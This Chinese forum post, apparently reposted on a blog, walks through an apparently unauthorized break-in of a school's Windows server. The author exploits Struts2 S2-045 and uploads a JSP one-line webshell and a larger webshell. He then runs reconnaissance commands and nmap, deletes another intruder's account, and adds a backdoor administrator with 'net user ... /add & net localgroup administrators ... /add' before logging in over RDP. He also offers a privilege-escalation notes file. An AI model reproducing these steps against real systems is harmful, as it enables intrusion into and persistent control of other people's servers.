st2漏洞利用php源码,记一次顺利提权st2-045漏洞服务器全过程.

本帖最后由 小爱_Joker 于 2017-3-13 16:35 编辑

突然发现 =  = 在i春秋群聊天 会有很多新手问你一些问题 当然 在帮他们解答的同时 你自己也会有很多文章的灵感吧 可以说是 因为 ...... 我也不知道怎么说 嘿嘿 进入正题

起因:秦国某小伙伴让我帮他提权下这个st2-045漏洞的服务器

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313213221.png (80.68 KB, 下载次数: 100)

2017-3-13 21:51 上传

接着上工具 一阵撸

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313215448.png (16.46 KB, 下载次数: 92)

2017-3-13 21:54 上传

[AppleScript] 纯文本查看 复制代码恭喜检测存在S2-045执行漏洞!

用户权限:nt authority\system

网站目录:D:\IMServer\apache-tomcat-7\webapps\embedded\\

这里可以直接执行cmd命令提权 但是我还是喜欢先拿个webshell 再装b提权

直接传大马的话他会报错

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313215728.png (34.26 KB, 下载次数: 102)

2017-3-13 21:59 上传

先传jsp一句话客户端连接

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313215925.png (15.87 KB, 下载次数: 95)

2017-3-13 21:59 上传

这里我不那么详细说了

上篇文章已经说过了

http://bbs.ichunqiu.com/thread-20224-1-1.html

如果还不懂的话请看视频教学。

Getshell成功 熟悉的大马界面

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313220456.png (93.85 KB, 下载次数: 131)

2017-3-13 22:05 上传

拿到webshell后 提权

这台服务器windows的 刚刚看了 执行几步曲就能轻松提权拿到服务器

[AppleScript] 纯文本查看 复制代码ver //查看版本

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313220652.png (14.49 KB, 下载次数: 95)

2017-3-13 22:07 上传

[AppleScript] 纯文本查看 复制代码whoami //查看权限

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313220701.png (15.57 KB, 下载次数: 96)

2017-3-13 22:07 上传

用nmap来扫描下开放端口信息

[AppleScript] 纯文本查看 复制代码nmap [url]www.xx.com[/url]

开放了3389

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313220910.png (21.94 KB, 下载次数: 131)

2017-3-13 22:09 上传

接着我们直接添加一个用户并且添加到管理员权限即可轻松拿到服务器

首先我们来查看下用户信息

net user  //查看用户信息

这个test222是我刚刚添加的 ps:感觉这台服务器  万人骑-  = 咳咳 自己实战了一次 才发文章= =

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313221013.png (17.82 KB, 下载次数: 106)

2017-3-13 22:10 上传

删除下这个用户

net user test222 /del

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313221103.png (2.95 KB, 下载次数: 109)

2017-3-13 22:11 上传

接着我们再来查看一下

我们会发现已经没有了test222用户

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313221126.png (18.26 KB, 下载次数: 117)

2017-3-13 22:11 上传

添加一个用户为xaisec 并且添加到管理员列表

net user xaisec xaisec /add & net localgroup administrators xaisec /add

以上命令 xaisec xaisec 是账号以及密码 net localgroup administrators xaisec /add 是吧用户xaisec 添加到管理员列表

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313221354.png (16.47 KB, 下载次数: 110)

2017-3-13 22:14 上传

继续查看下用户

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313221417.png (20.57 KB, 下载次数: 112)

2017-3-13 22:14 上传

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313221452.png (26.73 KB, 下载次数: 124)

2017-3-13 22:15 上传

成功连接 用户为xaisec 密码为xaisec

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313221952.png (20.12 KB, 下载次数: 113)

2017-3-13 22:20 上传

我日...这是什么。。

可怕了.........

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313222546.png (82.74 KB, 下载次数: 103)

2017-3-13 22:25 上传

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313222728.png (17.33 KB, 下载次数: 90)

2017-3-13 22:27 上传

我日 这内存= = 比我本机都好 我笔记本本机才4g mdzz!

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ图片20170313223532.png (22.59 KB, 下载次数: 92)

2017-3-13 22:37 上传

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313222927.png (27.24 KB, 下载次数: 110)

2017-3-13 22:29 上传

我日 10T? 666666

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ图片20170313230647.png (10.35 KB, 下载次数: 85)

2017-3-13 23:07 上传

本次只是记录下一次基础的提权过程  蛮顺利的 最后附赠提权笔记 贼全面。

89f67a9c510d55d43370ce40fb7282a2.gif

提权笔记.txt

(24.7 KB, 下载次数: 113)

2017-3-13 22:34 上传

点击文件名下载附件

下载积分: 魔法币 -5

另外= = 这主站还是个学校站 收录也不低

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170313234723.png (133.59 KB, 下载次数: 98)

2017-3-13 23:49 上传

目前我和空格表哥在帮他们维护 做点好事.

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ图片20170313235021.jpg (22.31 KB, 下载次数: 96)

2017-3-13 23:50 上传

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值